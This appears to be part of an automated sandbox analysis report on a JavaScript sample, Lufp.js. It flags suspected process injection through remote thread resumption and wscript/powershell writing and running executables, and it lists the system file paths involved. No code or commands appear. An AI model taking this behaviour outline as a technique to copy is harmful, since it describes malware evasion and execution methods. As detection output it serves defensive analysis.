Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2556 resumed a thread in remote process 2796
Process injection	Process 2796 resumed a thread in remote process 2908
NtResumeThread May 26, 2023, 10:20 a.m.	thread_handle: 0x000002f4 suspend_count: 1 process_identifier: 2796	1	0	0
NtResumeThread May 26, 2023, 10:20 a.m.	thread_handle: 0x000002fc suspend_count: 1 process_identifier: 2908	1	0	0

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Lufp.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All